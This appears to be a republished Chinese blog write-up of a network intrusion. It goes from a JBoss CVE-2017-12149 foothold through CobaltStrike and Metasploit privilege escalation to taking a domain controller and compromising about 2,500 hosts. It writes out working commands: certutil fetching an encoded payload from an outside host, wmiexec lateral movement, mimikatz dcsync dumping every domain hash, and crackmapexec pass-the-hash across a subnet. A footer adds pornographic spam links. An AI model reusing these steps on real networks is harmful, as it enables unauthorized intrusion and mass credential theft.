<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          一次利用 Metasploit 進行特權(quán)提權(quán),再到 2500 臺主機的內(nèi)網(wǎng)域滲透

          共 1619字,需瀏覽 4分鐘

           ·

          2022-05-09 23:15

          前言

          首先是通過 CVE-2017-12149 拿到了一個口子:

          d11bf7865e8e29b031bec37b7ab38c6a.webp

          但其實 Jboss 的這個路徑可以查看到日志 http://redteam.red:9090/status 發(fā)現(xiàn)有日志,已經(jīng)被上傳了 webshell:

          a22c83175614283e38e99210a3360570.webp

          后來通過 Bypass 后使用 powershell 上線到 CobaltStrike:

          405080ebb7d02e7fbac986fafa97f0d5.webp

          利用 Metasploit 特權(quán)提權(quán)拿到 SYSTEM SHELL

          上線之后通過信息搜集發(fā)現(xiàn)有幾百個補丁,通過已知漏洞提權(quán)無果:

          904a0ea06652037ac7d656f2fdc155ba.webp

          隨后吧 CobaltStrike 的 Beacon 互傳到了 Metasploit:

          CS:
          創(chuàng)建監(jiān)聽器windows/foreign/reverse_http
          執(zhí)行監(jiān)聽器 spawn msf

          MSF:
          use exploit/multi/handler
          set payload windows/meterpreter/reverse_http
          62cfaf9e4d627baaa86086614e00ce0e.webp

          f62b0d3a4013d32e5d9b2868d01c699d.webp

          然后通過 Metasploit 的提權(quán)檢測模塊找到了幾個提權(quán) exp :

          run post/multi/recon/local_exploit_suggester
          0a591389da145833435afbf5d4576064.webp

          然后利用提權(quán) exp :

          290b2b808773e93864012e3df19af898.webp

          發(fā)現(xiàn)用戶沒變,但是當(dāng)前特權(quán)變多了:

          a2afb59199bb5f261c65c9ebff4b1ce7.webp

          然后直接 getsystem 提權(quán)到 SYSTEM:

          61e1ee9bbfc4b44efed80897cd2e9d4c.webp

          最后利用 SYSYEM 身份的把 shell 傳到 Cobaltstrike:

          e6b0699153719dcf8995c6522a5e80e0.webp6721affbff2e7ccfd086fad08bae9512.webp

          當(dāng)前權(quán)限就可以抓到密碼了:

          bd362a1478e196b5e82c65e7de6ba78d.webp

          a778fc0d9f2155e5b953eae8118967f5.webp

          內(nèi)網(wǎng)滲透

          雖然已經(jīng)拿到 SYSTEM 會話身份,但是發(fā)現(xiàn)沒有域管的進程,結(jié)果只能另尋他路!然后用抓到到密碼去噴射域內(nèi)其他主機:

          a778fc0d9f2155e5b953eae8118967f5.webp

          然后橫向 wmi 橫向移動:

           proxychains python3 wmiexec.py -shell-type cmd administrator:[email protected] -codec gbk

          b51dc847421f631164dbcb618bf5dd0c.webp

          之后發(fā)現(xiàn) 10.xx.0.156 有一個域管的進程:tsklist /v

          并且發(fā)現(xiàn)當(dāng)前機器還有微軟自帶殺毒:

          b838e8db1d50cbba376c508ac73f06dc.webp

          隨后通過 Golang 做了一下免殺,然后讓目標(biāo)下載我們的 exe,通過 certutil 下載我們的 exe:

          e49c293871ec6377401a9c1159a100cc.webp

          然后運行發(fā)現(xiàn)有問題:

          f8600910e8e2548452b2ceb22c4ca197.webp

          然后我吧 exe 編碼成 txt:

          certutil -encode main.exe main.txt

          然后目標(biāo)下載 txt 然后解碼再運行:

          certutil.exe -urlcache -split -f http://redteam.red:80/download/main.txt

          certutil -decode main.txt main.exe

          直接上線到 CobaltStrike:

          770a2e8fd3da92a350b677100453f278.webp

          然后先 getsystem 提權(quán)到 SYSYEM:

          176f2c6e97233a171dbaad55cf53e064.webp

          然后竊取域管的進程:

          77f567270211699cb2c81cd61f46b287.webpff1d7f4bf6ac38a56b90e771a5b275fe.webp

          隨后查詢域控IP:

          shell net group "Domain Controllers" /domain
          shell ping Controllers Computer (ping 域控機器名即可得到IP)

          直接拿到域控:

          7f071f418a970edb8d8be7d2af7a2c47.webp

          最后直接 dcsync dump 域內(nèi)全部 hash:

          mimikatz lsadump::dcsync /domain:redteam.red /all /csv > c:\hash.txt

          ac90bf79f8685769a93e66d3e264207b.webp

          這個時候域內(nèi)數(shù)千多個域用戶的 hash 都拿到了,可以進行 pth,此時利用 administrator 的 hash 來對域內(nèi)機器進行批量執(zhí)行命令:

          proxychains crackmapexec smb 192.168.0.0/24 -u administrator -H xxxxxxxxxxxxxxxxxxxxx -d psnet.com -x "net user"

          5fbab97ebeee48f58b7186c6632e3c04.webp

          最后使用 SharpHound.exe 查看下域內(nèi)信息:

          execute-assembly /Users/saulgoodman/Downloads/SharpHound.exe -c all

          444d6d83e2d4c7d20d95face98757375.webp

          b67700f8e34674ed9ad730cc01418dde.webp

          看了看,內(nèi)網(wǎng) 5000 多個用戶,2500 多臺機器都淪陷,沒啥難度。

          瀏覽 105
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          評論
          圖片
          表情
          推薦
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  色婷婷一区二区三区久久午夜成人 | 欧美操逼穴激情 | 学生妹妹毛片 | 成人自拍视频在线观看 | 国产 码在线成人网站 |